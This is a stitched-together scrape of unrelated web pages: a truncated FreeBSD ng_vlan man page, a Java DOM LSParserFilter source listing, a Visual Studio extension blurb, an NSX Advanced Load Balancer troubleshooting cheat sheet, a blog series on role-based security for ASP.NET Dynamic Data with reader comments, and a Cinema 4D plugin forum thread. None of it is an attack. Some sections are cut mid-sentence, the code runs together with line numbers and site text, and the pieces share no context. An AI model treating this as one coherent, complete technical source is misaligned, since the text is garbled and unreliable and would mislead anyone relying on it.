ng_vlan - IEEE 802.1Q VLAN tagging netgraph node type
SYNOPSIS
#include <sys/types.h> #include <netgraph.h> #include <netgraph/ng_vlan.h>
DESCRIPTION
The vlan node hook.
HOOKS
This node type supports the following hooks: downstream Typically this hook would be connected to a ng_ether(4) node, using the lower hook. nomatch Typically this hook would also be connected to an ng_ether(4) type node using the upper hook. 〈any valid name〉 Any other hook name will be accepted and should later be associated with a particular tag. Typically this hook would be attached to an ng_eiface(4) type node using the ether hook.
CONTROL MESSAGES
This
This node shuts down upon receipt of a NGM_SHUTDOWN control message, or when all hooks have been disconnected.
SEE ALSO
netgraph(4), ng_eiface(4), ng_ether(4), ngctl(8), nghook(8)
HISTORY
The ng_vlan node type appeared in FreeBSD 4.10.
AUTHORS
Ruslan Ermilov 〈[email protected]〉 | http://manpages.ubuntu.com/manpages/intrepid/man4/ng_vlan.4freebsd.html | CC-MAIN-2015-27 | refinedweb | 153 | 68.47 |
#Introduction
The Agility CMS Model Updater allows you to seamlessly download and replace your strongly typed classes that represent your content and module definitions within Visual Studio.
Increase your Agility CMS development efficiency.
Instead of manually downloading your C# API classes from the Content Manager, simply select your C# API file within your VS project and right-click to update the classes automatically.
#Setup
The first time you open your project, you will need to right-click your C# API file and click Link Model.
Next, right-click the file again and click Update Model.
A window will now prompt you to login with your Agility user credentials.
Lastly, confirm the namespace that will be used to wrap your Agility C# API classes.
###Contributors
A special thank you goes out to Adriano Ueda () for sharing this extension with the community. | https://marketplace.visualstudio.com/items?itemName=AgilityInc.VS2017-2018-05-17 | CC-MAIN-2019-47 | refinedweb | 140 | 54.12 |
.ls;14 15 import org.w3c.dom.Node ;16 import org.w3c.dom.Element ;17 18 /**19 * <code>LSParserFilter</code>s provide applications the ability to examine 20 * nodes as they are being constructed while parsing. As each node is 21 * examined, it may be modified or removed, or the entire parse may be 22 * terminated early. 23 * <p> At the time any of the filter methods are called by the parser, the 24 * owner Document and DOMImplementation objects exist and are accessible. 25 * The document element is never passed to the <code>LSParserFilter</code> 26 * methods, i.e. it is not possible to filter out the document element. 27 * <code>Document</code>, <code>DocumentType</code>, <code>Notation</code>, 28 * <code>Entity</code>, and <code>Attr</code> nodes are never passed to the 29 * <code>acceptNode</code> method on the filter. The child nodes of an 30 * <code>EntityReference</code> node are passed to the filter if the 31 * parameter "<a HREF=''>32 * entities</a>" is set to <code>false</code>. Note that, as described by the parameter "<a HREF=''>33 * entities</a>", unexpanded entity reference nodes are never discarded and are always 34 * passed to the filter. 35 * <p> All validity checking while parsing a document occurs on the source 36 * document as it appears on the input stream, not on the DOM document as it 37 * is built in memory. With filters, the document in memory may be a subset 38 * of the document on the stream, and its validity may have been affected by 39 * the filtering. 40 * <p> All default attributes must be present on elements when the elements 41 * are passed to the filter methods. All other default content must be 42 * passed to the filter methods. 43 * <p> DOM applications must not raise exceptions in a filter. The effect of 44 * throwing exceptions from a filter is DOM implementation dependent. 45 * <p>See also the <a HREF=''>Document Object Model (DOM) Level 3 Load46 and Save Specification</a>.47 */48 public interface LSParserFilter {49 // Constants returned by startElement and acceptNode50 /**51 * Accept the node.52 */53 public static final short FILTER_ACCEPT = 1;54 /**55 * Reject the node and its children.56 */57 public static final short FILTER_REJECT = 2;58 /**59 * Skip this single node. The children of this node will still be 60 * considered. 61 */62 public static final short FILTER_SKIP = 3;63 /**64 * Interrupt the normal processing of the document. 65 */66 public static final short FILTER_INTERRUPT = 4;67 68 /**69 * The parser will call this method after each <code>Element</code> start 70 * tag has been scanned, but before the remainder of the 71 * <code>Element</code> is processed. The intent is to allow the 72 * element, including any children, to be efficiently skipped. Note that 73 * only element nodes are passed to the <code>startElement</code> 74 * function. 75 * <br>The element node passed to <code>startElement</code> for filtering 76 * will include all of the Element's attributes, but none of the 77 * children nodes. The Element may not yet be in place in the document 78 * being constructed (it may not have a parent node.) 79 * <br>A <code>startElement</code> filter function may access or change 80 * the attributes for the Element. Changing Namespace declarations will 81 * have no effect on namespace resolution by the parser.82 * <br>For efficiency, the Element node passed to the filter may not be 83 * the same one as is actually placed in the tree if the node is 84 * accepted. And the actual node (node object identity) may be reused 85 * during the process of reading in and filtering a document.86 * @param elementArg The newly encountered element. At the time this 87 * method is called, the element is incomplete - it will have its 88 * attributes, but no children. 89 * @return 90 * <ul>91 * <li> <code>FILTER_ACCEPT</code> if the <code>Element</code> should 92 * be included in the DOM document being built. 93 * </li>94 * <li> 95 * <code>FILTER_REJECT</code> if the <code>Element</code> and all of 96 * its children should be rejected. 97 * </li>98 * <li> <code>FILTER_SKIP</code> if the 99 * <code>Element</code> should be skipped. All of its children are 100 * inserted in place of the skipped <code>Element</code> node. 101 * </li>102 * <li> 103 * <code>FILTER_INTERRUPT</code> if the filter wants to stop the 104 * processing of the document. Interrupting the processing of the 105 * document does no longer guarantee that the resulting DOM tree is 106 * XML well-formed. The <code>Element</code> is rejected. 107 * </li>108 * </ul> Returning 109 * any other values will result in unspecified behavior. 110 */111 public short startElement(Element elementArg);112 113 /**114 * This method will be called by the parser at the completion of the 115 * parsing of each node. The node and all of its descendants will exist 116 * and be complete. The parent node will also exist, although it may be 117 * incomplete, i.e. it may have additional children that have not yet 118 * been parsed. Attribute nodes are never passed to this function.119 * <br>From within this method, the new node may be freely modified - 120 * children may be added or removed, text nodes modified, etc. The state 121 * of the rest of the document outside this node is not defined, and the 122 * affect of any attempt to navigate to, or to modify any other part of 123 * the document is undefined. 124 * <br>For validating parsers, the checks are made on the original 125 * document, before any modification by the filter. No validity checks 126 * are made on any document modifications made by the filter.127 * <br>If this new node is rejected, the parser might reuse the new node 128 * and any of its descendants.129 * @param nodeArg The newly constructed element. At the time this method 130 * is called, the element is complete - it has all of its children 131 * (and their children, recursively) and attributes, and is attached 132 * as a child to its parent. 133 * @return 134 * <ul>135 * <li> <code>FILTER_ACCEPT</code> if this <code>Node</code> should 136 * be included in the DOM document being built. 137 * </li>138 * <li> 139 * <code>FILTER_REJECT</code> if the <code>Node</code> and all of its 140 * children should be rejected. 141 * </li>142 * <li> <code>FILTER_SKIP</code> if the 143 * <code>Node</code> should be skipped and the <code>Node</code> 144 * should be replaced by all the children of the <code>Node</code>. 145 * </li>146 * <li> 147 * <code>FILTER_INTERRUPT</code> if the filter wants to stop the 148 * processing of the document. Interrupting the processing of the 149 * document does no longer guarantee that the resulting DOM tree is 150 * XML well-formed. The <code>Node</code> is accepted and will be the 151 * last completely parsed node. 152 * </li>153 * </ul>154 */155 public short acceptNode(Node nodeArg);156 157 /**158 * Tells the <code>LSParser</code> what types of nodes to show to the 159 * method <code>LSParserFilter.acceptNode</code>. If a node is not shown 160 * to the filter using this attribute, it is automatically included in 161 * the DOM document being built. See <code>NodeFilter</code> for 162 * definition of the constants. The constants <code>SHOW_ATTRIBUTE</code>163 * , <code>SHOW_DOCUMENT</code>, <code>SHOW_DOCUMENT_TYPE</code>, 164 * <code>SHOW_NOTATION</code>, <code>SHOW_ENTITY</code>, and 165 * <code>SHOW_DOCUMENT_FRAGMENT</code> are meaningless here. Those nodes 166 * will never be passed to <code>LSParserFilter.acceptNode</code>. 167 * <br> The constants used here are defined in [<a HREF=''>DOM Level 2 Traversal and Range</a>]168 * . 169 */170 public int getWhatToShow();171 172 }173
Java API By Example, From Geeks To Geeks. | Our Blog | Conditions of Use | About Us_ | | http://kickjava.com/src/org/w3c/dom/ls/LSParserFilter.java.htm | CC-MAIN-2017-04 | refinedweb | 1,294 | 54.12 |
NSX Advanced Load Balancer - Logging and Troubleshooting Cheat Sheet
Get into the OS Shell (all elements)
sudo su
Controller Log Locations
Note: Everything in
/var/lib/avi/logs is managed by Elasticsearch. I wouldn't mess with it.
Events published to the GUI:
/var/lib/avi/logs/ALL-EVENTS/
The primary log directory for Avi Vantage Controllers is
/opt/avi/log. As this feeds into Elasticsearch, they have file outputs for every severity level. An easy way to get data on a specific object would be to build a
grep statement like this:
grep {{ regex }} /opt/avi/log/{{ target }}
alert_notifications_*: Summarized problems log. Events are in a
jsonformat!
Troubleshooting Deployment Failures
avi-nsx.*: Presumably for NSX-T integration. further investigation required
cloudconnectorgo.*: Avi's cloud connector is pretty important given their architecture. This is where you can troubleshoot any issues getting a cloud turned up, or any initial provisioning issues.
vCenter*: vCenter write mode activity logs. Look here for SE deployment failures in a traditional vSphere cloud.
Service Engines
Troubleshooting
Checking the Routing Table
NSX ALB / Avi uses FRRouting (7.0 as of release 20.1) over network namespaces to achieve management/data plane separation and VRF-Lite. To access the data plane, you will need to change namespaces! Unlike NSX-T, this doesn't happen over docker namespaces. This means that the follow commands work in both as root:
- Show all VRF+Namespaces
ip netns show
- Send a one-shot command to the namespace:
ip netns exec {{ namespace }} {{ command }}Example:
ip netns exec 'ip route show'
- Start a shell in the desired namespace:
ip netns exec {{ namespace }} {{ shell }}Example:
ip netns exec avi_ns1 bash
After in the
bash shell, all normal commands apply as if there was no namespace/VRF.
For more information on Linux Network Namespaces, here's a pretty good guide:
Logging
All SE logging is contained in
/var/lib/avi/log. Here are the significant log directories there:
- IMPORTANT!
bgp: This is where all the routing protocol namespace logging from FRRouting lands.
traffic: This one's pretty touch to parse and it's better to use Avi's Elasticsearch instead.
Conclusion
Avi Vantage has a pretty solid logging schema, but is very much a growing product. These logs will eventually be exposed more fully to the GUI/API, but for now it's handy to
grep away. I'll be updating this list as I find more.
Discussion (0) | https://dev.to/ngschmidt/troubleshooting-with-vmware-nsx-alb-avi-vantage-23pc | CC-MAIN-2022-33 | refinedweb | 403 | 57.06 |
This is an updated version of the series Securing Dynamic Data Preview 4 from July 2009 here I playnto streamline the class libraries for the RTM version of Dynamic Data 4 and Visual Studio 2010.
This version is mostly the same as in Part 1 except I’ve done a great deal of refactoring and so I will list everything again here. The main difference is that there are now no user controls to replace the Delete buttons. Also I have changed the permissions system to be restrictive by default at Table level i.e. you must have a permission set on every table for the table to be seen, but a Column level you deny columns you don’t want to be seen.
Permissions Enums
The TableActions (renamed from TableDeny) enum Listing 1 has had a CombinedActions class Listing 2 added that combine sets of TableActions into logical security groups (i.e. ReadOnly equates to combining TablesActions Details and List to give an more descriptive was of assigning rights to a security Role).
/// <summary> /// Table permissions enum, allows different /// levels of permission to be set for each /// table on a per role bassis. /// </summary> [Flags] public enum TableActions { /// <summary> /// Default no permissions /// </summary> None = 0x00, /// <summary> /// Details page /// </summary> Details = 0x01, /// <summary> /// List page /// </summary> List = 0x02, /// <summary> /// Edit page /// </summary> Edit = 0x04, /// <summary> /// Insert page /// </summary> Insert = 0x08, /// <summary> /// Delete operations /// </summary> Delete = 0x10, }
Listing 1 – TableActions
/// <summary> /// Combines Table permissions enums /// into logical security groups /// i.e. ReadOnly combines TableActions /// Details and List /// </summary> public static class CombinedActions { /// <summary> /// Read Only access /// TableActions.Details or /// TableActions.List /// </summary> public const TableActions ReadOnly = TableActions.Details | TableActions.List; /// <summary> /// Read and Write access /// TableActions.Details or /// TableActions.List or /// TableActions.Edit /// </summary> public const TableActions ReadWrite = TableActions.Details | TableActions.List | TableActions.Edit; /// <summary> /// Read Insert access /// TableActions.Details or /// TableActions.List or /// TableActions.Insert /// /// </summary> public const TableActions ReadInsert = TableActions.Details | TableActions.List | TableActions.Insert; /// <summary> /// Read Insert and Delete access /// TableActions.Details or /// TableActions.List or /// TableActions.Insert or /// TableActions.Delete) /// </summary> public const TableActions ReadInsertDelete = TableActions.Details | TableActions.List | TableActions.Insert | TableActions.Delete; /// <summary> /// Read and Write access /// TableActions.Details or /// TableActions.List or /// TableActions.Edit or /// TableActions.Insert) /// </summary> public const TableActions ReadWriteInsert = TableActions.Details | TableActions.List | TableActions.Edit | TableActions.Insert; /// <summary> /// Full access /// TableActions.Delete or /// TableActions.Details or /// TableActions.Edit or /// TableActions.Insert or /// TableActions.List) /// </summary> public const TableActions Full = TableActions.Delete | TableActions.Details | TableActions.Edit | TableActions.Insert | TableActions.List; }
Listing 2 – CombinedActions
ColumnActions Listing 3 are used to deny either Write or Read access.
/// <summary> /// Actions a Column can /// have assigned to itself. /// </summary> [Flags] public enum ColumnActions { /// <summary> /// Action on a column/property /// </summary> DenyRead = 1, /// <summary> /// Action on a column/property /// </summary> DenyWrite = 2, }
Listing 3 – ColumnActions
Secure Dynamic Data Route Handler
The SecureDynamicDataRouteHandler has changed very little since the original article all I have added is the catch all tp.Permission == CombinedActions.Full in the if statement to streamline the code.
/// <summary> /// The SecureDynamicDataRouteHandler enables the /// user to access a table based on the following: /// the Roles and TableDeny values assigned to /// the SecureTableAttribute. /// </summary> public class SecureDynamicDataRouteHandler : DynamicDataRouteHandler { /// <summary> /// Creates the handler. /// </summary> /// <param name="route">The route.</param> /// <param name="table">The table.</param> /// <param name="action">The action.</param> /// <returns>An IHttpHandler</returns> public override IHttpHandler CreateHandler( DynamicDataRoute route, MetaTable table, string action) { var httpContext = HttpContext.Current; if (httpContext != null && httpContext.User != null) { var usersRoles = Roles.GetRolesForUser(httpContext.User.Identity.Name); var tablePermissions = table.Attributes.OfType<SecureTableAttribute>(); // if no permission exist then full access is granted if (tablePermissions.Count() == 0) return null; foreach (var tp in tablePermissions) { if (tp.HasAnyRole(usersRoles)) { // if no action is allowed return no route var tpAction = tp.Permission.ToString().Split(new char[] { ',', ' ' }, StringSplitOptions.RemoveEmptyEntries); if (tp.Permission == CombinedActions.Full || tpAction.Contains(action)) return base.CreateHandler(route, table, action); } } } return null; } }
Listing 4 – Secure Dynamic Data Route Handler
This then covers all Edit, Insert and Details actions but not Delete.
Delete Actions
In the previous article we had a User Control that handled securing the Delete action, here we have a SecureLinkButton. All we do is override the Render method and test to see if the button is disabled via the users security roles.
/// <summary> /// Secures the link button when used for delete actions /// </summary> public class SecureLinkButton : LinkButton { private const String event. /// </summary> /// <param name="e"> /// An <see cref="T:System.EventArgs"/> /// object that contains the event data. /// </param> protected override void OnInit(EventArgs e) { if (ConfigurationManager.AppSettings.AllKeys.Contains(DISABLED_NAMES)) delete = ConfigurationManager.AppSettings[DISABLED_NAMES] .ToLower() .Split(new char[] { ',' }, StringSplitOptions.RemoveEmptyEntries); base.OnInit(e); } /// <summary> /// Renders the control to the specified HTML writer. /// </summary> /// <param name="writer"> /// The <see cref="T:System.Web.UI.HtmlTextWriter"/> /// object that receives the control content. /// </param> protected override void Render(HtmlTextWriter writer) { if (!IsDisabled()) base.Render(writer); else writer.Write(String.Format("<a>{0}</a>", Text)); } /// <summary> /// Determines whether this instance is disabled. /// </summary> /// <returns> /// <c>true</c> if this instance is /// disabled; otherwise, <c>false</c>. /// </returns> private Boolean IsDisabled() { if (!delete.Contains(CommandName.ToLower())) return false; // get restrictions for the current // users access to this table var table = DynamicDataRouteHandler.GetRequestMetaTable(Context); var usersRoles = Roles.GetRolesForUser(); var tableRestrictions = table.Attributes.OfType<SecureTableAttribute>(); // restrictive permissions if (tableRestrictions.Count() == 0) return true; foreach (var tp in tableRestrictions) { // the LinkButton is considered disabled if delete is denied. var action = CommandName.ToEnum<TableActions>(); if (tp.HasAnyRole(usersRoles) && (tp.Actions & action) == action) return false; } return true; } }
Listing 5 – Secure Link Button
In more detail the IsDisabled method check to see if the LinkButtons CommandName is the same as the the “SecureLinkButtonDeleteCommandNames” application setting set in the web.config, note the default is “delete”. And then if the user does not have Delete permission then the button is disabled.
So how do we use this SecureLinkButton we add a tagMapping in the web.config file see Listing 6.
<configuration> <system.web> <pages> <controls> <!-- custom tag assignments --> <add tagPrefix="asp" namespace="NotAClue.Web.DynamicData" assembly="NotAClue.Web.DynamicData" /> </controls> <!-- custom tag mappings --> <tagMapping> <add tagType="System.Web.UI.WebControls.LinkButton" mappedTagType="NotAClue.Web.DynamicData.SecureLinkButton" /> </tagMapping> </pages> </system.web> </configuration>
Listing 6 – Tag Mapping in web.config
This means that our SecureLinkButton will replace the LinkButton throughout the site, however if you do not like this you can just rename each delete <asp:LinkButton to <asp:SecureLinkButton and then you will get the same effect and not add the tagMapping section to the web.config.
The Secure Meta Model
Here the two main parts are the SecureMetaTable and the three MetaColumn types (SecureMetaColumn, SecureMetaForeignKeyColumn and SecureMetaChildrenColumn)
SecureMetaTable
In the SecureMetaTable we override the GetScaffoldColumns method and filter the column list to where columns do not have a DenyRead action applied for any of the current users security roles.
SecureMetaColumn, SecureMetaForeignKeyColumn and SecureMetaChildrenColumn
With these types we do have to repeat ourselves a little as we override the IsReadOnly property to check to see if the column has a DenyWrite action applied for one of the users roles.With these types we do have to repeat ourselves a little as we override the IsReadOnly property to check to see if the column has a DenyWrite action applied for one of the users roles.
There is one issue I found and that is the default FieldTemplateFactory caches the DynamicControl model (ReadOnly, Edit and Insert) I did toy with adding the relevant code the default EntityTemplates see Listing 7, but decided again it.
protected void DynamicControl_Init(object sender, EventArgs e) { DynamicControl dynamicControl = (DynamicControl)sender; dynamicControl.DataField = currentColumn.Name; // test for read-only column if (currentColumn.IsReadOnly) dynamicControl.Mode = DataBoundControlMode.ReadOnly; }
Listing 7 – adding control mode code to the default EntityTemplates
Instead I decided to use a custom FieldTemplateFactory see Listing 8
public class SecureFieldTemplateFactory : FieldTemplateFactory { public override IFieldTemplate CreateFieldTemplate(MetaColumn column, DataBoundControlMode mode, string uiHint) { // code to fix caching issue if (column.IsReadOnly) mode = DataBoundControlMode.ReadOnly; return base.CreateFieldTemplate(column, mode, uiHint); } }
Listing 8 – Secure Field Template Factory
The code here is simple we just check to see if the column is read-only (remembering that the SecureMetaColumns are already checking this for us) then set the Mode to DataBoundControlMode.ReadOnly. This nicely keeps our code DRY.
Secure Table and Column Attributes
These are essentially unchanged from the previous series of articles with just a little refactoring to make the code more readable.
Putting It Together
Nearly all the work to get Secure Dynamic Data working is done simply in the Global.asax file.
Figure 1 – Adding Security to Dynamic Data
Also you need the tag mapping from Listing 6, there are some more bits we need to do but they are standard ASP.Net Security, so let’s get that done next.
<authentication mode="Forms"> <forms loginUrl="~/Login.aspx" protection="All" defaultUrl="~/Default.aspx" path="/"/> </authentication> <authorization> <deny users="?"/> </authorization> > <roleManager enabled="true" />
Listing 9 – Adding standard ASP.Net security to web.config
<location path="Site.css"> <system.web> <authorization> <allow users="*"/> </authorization> </system.web> </location>
Listing 10 – Allowing access to style sheet.
With SQL Server 200x Express edition installed you will get the ASPNETDB created automatically.
Figure 1 - ASP.Net Configuration Utility
Downloads
I think that is about it, so here is the download it contains three projects the Class Library and two sample projects one Entity Framework and one Linq to SQL. Have fun.
40 comments:
Man...You have answers on all my questions... I write dynamic data asp.net application for final exam on college and here I found all the answers I need... You are excellent! My concerns was about roles and Dynamic Data ASP.NET Web Linq to SQL application, customizing field templates,... MSDN helps too, but You are much concrete..Thank You a lot... In my country said that we are young that much are thoughts are young...You're daughters are wrong, You cant be that old, You are still pretty much in shape.. Sorry about bad English... Keep with good work...
Thanks Joe :)
Steve
hi,
I downloaded this sample and change connection string in EF web config and i get this Exception after i logged in "There are no accessible tables. Make sure that at least one data model is registered in Global.asax and scaffolding is enabled or implement custom pages"
Seif
There must be an issue with your connection string sorry about that.
Steve
Thanks Stephen for this great blog,it contains very helpful articles,thanks again for this great work.
I solve the previous issue,but i has another issued,i trying Walkthrough sample for filtering Rows in Tables That Have a Parent-Child Relationship ( ),I get this Exception Unable to cast object of type 'NotAClue.Web.DynamicData.SecureMetaColumn' to type 'System.Web.DynamicData.MetaForeignKeyColumn'
Seif
Hi Seif, not sure what is going ont here as I cannot think of a reason why that cast would occur.
Steve :(
Hi steve, would it be possible to do this with inline editing enabled?
Hi Mr Anonymous :) it should just work as is as long as your InLine Edit page get's it's columns the normal way. I have tested this method with the Telerik RadGrid and that works fine, and I should be blogging about that as soon as time allows.
Steve
Hi Steve, thanks for your quick response for Mr. Anonymous =)
Mind checking to see if i'm doing anything wrong? "User" role are still able to edit/delete (through inline editing). However everything works if i went back into separate-page mode.
routes.Add(new DynamicDataRoute( {table}/ListDetails.aspx") {
Action = PageAction.List,
ViewName = "ListDetails",
RouteHandler = new SecureDynamicDataRouteHandler(),
Model = DefaultModel
});
routes.Add(new DynamicDataRoute("{table}/ListDetails.aspx") {
Action = PageAction.Details,
ViewName = "ListDetails",
RouteHandler = new SecureDynamicDataRouteHandler(),
Model = DefaultModel
});
unless i putting the "routehandler" at the wrong place.
Hi Eddy that looks fine the issue will be with the control you are using. By default all the pages in DD4 use LinkButton or DynamicHyperLink I've made sure that LinkButton is fixed but I had'nt noticed the use of the DynamicHyperLink this will probably be the issue.
Steve
Hi Steve, everything has been on default. I had manually changed LinkButton to SecureLinkButton. Do not see any DynamicHyperLink. Using DD4 & EF. All controls are default. When i put my mouse over Edit/Delete, the hyperlinks appear to be "javascript:__doPostBack('ctl00$ContentPlaceHolder1$GridView1','Delete$0')" & " javascript:__doPostBack('ctl00$ContentPlaceHolder1$GridView1','Edit$0')"
I will try to test it with the standard List DetailsPage as soon as I get the time
Steve
any luck??? =/
Have you tried running the sample on it's own?
Steve
Hi Steve, thank you for your great work.
Have you released a improved version for your database based secure DD?
Not yet, but I do play to for DD4
Steve
I tried this and got the following error message.
Any clues?
The database '5E98F77B1B99BCB7839B5BA9D7C561BC_RE DYNAMIC DATA\SECURINGDYNAMICDATA - 2010-06-13A\SECURINGDYNAMICDATA_L2S\APP_DATA\ASPNETDB.MDF' cannot be opened because it is version 661. This server supports version 612 and earlier. A downgrade path is not supported.
you will need to delete the ASPNET DB and create again as it is for SQL Server 'Express 2008 R2
Steve
Hi Steve,
Do you have an updated version of this? I might be running into the same issue as Eddy above. Everything worked beautifuly when i was using the List.aspx Page template but after switching over to ListDetails.aspx..not so much. I have specified the 2 different TableActions (ReadOnly for one role and Full for another role) on the samet table and everything seems to go pear shaped ... I always get full access..i haven't stepped into the code yet but does this framework currently support "stacking" table actions for different roles? Let me know.
Sorry no I will look at doing somthing about the ListDetaisl page though in the future.
Steve
Hi Steve, Thanks for your great work.
I configured my Application to run with SecureMetaModel and now I would like to see TableActions and ColumnAction enums selected from a DropDownList. How I can do this with Entity Framework?
Enrico
Sorry Enrico, not aure what you are after this version only has static metadata?
Steve
Ok, now I have it working. I had to retrieve authorization settings from a Sql db; I tried to use some ideas from "DynamicData: Database Based Permissions - Part 2". But I need to load also the 'CombinedActions' joined with 'TableActions'.
:-D
Ok, with [FilterUIHint("Enumeration")] and
[EnumDataType(typeof(SelectedTableActions))] before "permission" I have solved those issues with enum data type. Thank you and Dynamic Data 4 team!
Hi Stephen,
Could you provide us a newer version of the populated AspNetDB.mdf with the 2 users (Admin,User)?
Thank you.
Just user ASP.Net Configuration from VS to configure this.
Steve
Thanks Steve you have been a great help for me because I've used DD for my master thesis.
Hi KOsmix, thanks glad I was able to help.
Steve
Hi Steve,
I'm having some issues with using "DenyWrite" on columns. I can set up table permissions just fine and DenyRead on columns works, but if I set DenyWrite, I get errors. The edit screen displays correctly (showing the field as read only), but once I click update, I'm getting errors about how the read only field can't be null, even though it was populated in the edit screen with a value.
I've looked at the OSM in the SavingChanges method, and for some reason, the entity shows up with all null values (except its ID number). As such, it's throwing exceptions because required fields are null. It's not just the fields that have the SecureColumn attribute with DenyWrite in the metadata - if any field has it, all of the fields show up as null in the object state manager.
I'm using the DLL from the NotAClue.DynamicData project in the sample.
Any ideas why this might be happening?
Thanks.
Hi Amy, I've only had this sort of issue once and is was a bug in EF when I used mapped SPROCS for CRUD in the EF model, I reproed it with normal webformas pages. if your not using mapped SPROCs for CRUD I don't know what is happening.
Steve
That's exactly what it was. Removed the SQL stored procedures and it works fine. I suppose I need to go incorporate those into code now, but at least it works.
Thanks for your help!
Yes that is a nast bug and it only shows up when you have a column missing from the edit or read only :(
Steve
That is really fantastic! Thanks Steve for this useful code. Just one more little question: i would like to hide the hyperlinks "edit" and "delete" in case of CombinedActions.ReadOnly. The delete-link ist rendered in SecureLinkButton.cs, therefor i replaced "writer.Write(String.Format("{0}", Text))" by "writer.Write(String.Format("", Text))". But what would be the best approach to render the "edit" hyperlink?
Regards Tillmann
Hi Tillmann, direct e-mail and we can discuss in detail.
Steve
Hi Steve,
Great code again! Do you have implemented your securing solution in AD environment? I am trying to modify your solution, but I have a problem to access session object from SecureDynamicDataRouteHandler. I store users AD roles in session object. Thanks
Hi Miloš, yes it works fine with the AD provider, your only issue is the Roles, if you want to use AD Groups the you would need an AD Roles provider and that has issues. I rolled my own and is does caching of users Roles as AD so slow it really slowed down my web site. If you want the code please send me an e-mail direct my address in on my blog.
Steve
Exactly, my problem is unacceptable slow performance of web application after adding AD security. I have send you an email with my details. Thanks
Thats it Steve, thanks for your final code! My AD rolled application is now working like a charm!
Hi Steve,
I am unable to see your downloads. Any other way I could get them for reference?
Thanks!
Hi Sabrina, you will have to search my One Drive public folder here
to find the download Microsoft did a change a while back to SkyDrive that messedup ALL my downloads, but they are still there on One Drive :)
Steve | http://csharpbits.notaclue.net/2010/06/securing-dynamic-data-4-replay.html | CC-MAIN-2018-51 | refinedweb | 3,070 | 50.53 |
/* * _msg.h 1.7 86/07/16 SMI * from: @(#)rpc_msg.h 2.1 88/07/29 4.0 RPCSRC * $Id: rpc_msg.h,v 1.3 2004/10/28 21:58:24 emoy Exp $ */ /* * rpc_msg.h * rpc message definition * * Copyright (C) 1984, Sun Microsystems, Inc. */ #ifndef _RPC_RPCMSG_H #define _RPC_RPCMSG_H #ifdef __LP64__ #define RPC_MSG_VERSION ((unsigned int) 2) #else #define RPC_MSG_VERSION ((unsigned long) 2) #endif #define RPC_SERVICE_PORT ((unsigned short) 2048) /* * Bottom up definition of an rpc message. * NOTE: call and reply use the same overall stuct but * different parts of unions within it. */ enum msg_type { CALL=0, REPLY=1 }; enum reply_stat { MSG_ACCEPTED=0, MSG_DENIED=1 }; enum accept_stat { SUCCESS=0, PROG_UNAVAIL=1, PROG_MISMATCH=2, PROC_UNAVAIL=3, GARBAGE_ARGS=4, SYSTEM_ERR=5 }; enum reject_stat { RPC_MISMATCH=0, AUTH_ERROR=1 }; /* * Reply part of an rpc exchange */ /* * Reply to an rpc request that was accepted by the server. * Note: there could be an error even though the request was * accepted. */ struct accepted_reply { struct opaque_auth ar_verf; enum accept_stat ar_stat; union { struct { #ifdef __LP64__ unsigned int low; unsigned int high; #else unsigned long low; unsigned long high; #endif } AR_versions; struct { caddr_t where; xdrproc_t proc; } AR_results; /* and many other null cases */ } ru; #define ar_results ru.AR_results #define ar_vers ru.AR_versions }; /* * Reply to an rpc request that was rejected by the server. */ struct rejected_reply { enum reject_stat rj_stat; union { struct { #ifdef __LP64__ unsigned int low; unsigned int high; #else unsigned long low; unsigned long high; #endif } RJ_versions; enum auth_stat RJ_why; /* why authentication did not work */ } ru; #define rj_vers ru.RJ_versions #define rj_why ru.RJ_why }; /* * Body of a reply to an rpc request. */ struct reply_body { enum reply_stat rp_stat; union { struct accepted_reply RP_ar; struct rejected_reply RP_dr; } ru; #define rp_acpt ru.RP_ar #define rp_rjct ru.RP_dr }; /* * Body of an rpc request call. */ struct call_body { #ifdef __LP64__ unsigned int cb_rpcvers; /* must be equal to two */ unsigned int cb_prog; unsigned int cb_vers; unsigned int cb_proc; #else unsigned long cb_rpcvers; /* must be equal to two */ unsigned long cb_prog; unsigned long cb_vers; unsigned long cb_proc; #endif struct opaque_auth cb_cred; struct opaque_auth cb_verf; /* protocol specific - provided by client */ }; /* * The rpc message */ struct rpc_msg { #ifdef __LP64__ unsigned int rm_xid; #else unsigned long rm_xid; #endif enum msg_type rm_direction; union { struct call_body RM_cmb; struct reply_body RM_rmb; } ru; #define rm_call ru.RM_cmb #define rm_reply ru.RM_rmb }; #define acpted_rply ru.RM_rmb.ru.RP_ar #define rjcted_rply ru.RM_rmb.ru.RP_dr __BEGIN_DECLS /* * XDR routine to handle a rpc message. * xdr_callmsg(xdrs, cmsg) * XDR *xdrs; * struct rpc_msg *cmsg; */ extern bool_t xdr_callmsg __P((XDR *, struct rpc_msg *)); /* * XDR routine to pre-serialize the static part of a rpc message. * xdr_callhdr(xdrs, cmsg) * XDR *xdrs; * struct rpc_msg *cmsg; */ extern bool_t xdr_callhdr __P((XDR *, struct rpc_msg *)); /* * XDR routine to handle a rpc reply. * xdr_replymsg(xdrs, rmsg) * XDR *xdrs; * struct rpc_msg *rmsg; */ extern bool_t xdr_replymsg __P((XDR *, struct rpc_msg *)); /* * Fills in the error part of a reply message. * _seterr_reply(msg, error) * struct rpc_msg *msg; * struct rpc_err *error; */ extern void _seterr_reply __P((struct rpc_msg *, struct rpc_err *)); __END_DECLS #endif /* !_RPC_RPCMSG_H */ | http://opensource.apple.com/source/Libinfo/Libinfo-330.7/rpc.subproj/rpc_msg.h | CC-MAIN-2013-48 | refinedweb | 483 | 55.24 |
Your browser does not seem to support JavaScript. As a result, your viewing experience will be diminished, and you have been placed in read-only mode.
Please download a browser that supports JavaScript, or enable it if it's disabled (i.e. NoScript).
Hi there,
I'm wondering, is it possible to avoid IsActive() in Message to support older C4D-Versions.
IsActive()
In another thread: we've talked about the ability to drag BitmapButtons into the layout via SetCommandDragId.
SetCommandDragId)
return True
def Message(self, msg, result):
if msg.GetId() == c4d.BFM_INTERACTEND:
if self.IsActive(10003):
print 'Icon clicked in the GeDialog.'
Is it simply not possible to support older C4D-Versions AND have a draggable BitmapButton...?
Thanks,
Lasse
Hi @lasselauch, I will take a look, but only in few days since R18 is the minimal version working for IsActive and it's more than 3years old, while we provide support only for 2 previous release.
But maybe there is another way to catch this kind of stuff that would work in older version so that's why I said I will take a look.
Cheers,
Maxime.
Thanks @m_adam,
for now I've added a workaround for older versions so it's not possible to drag the buttons to the layout.
Works for me, but would be nice to know anyway.
Hi Maxime,
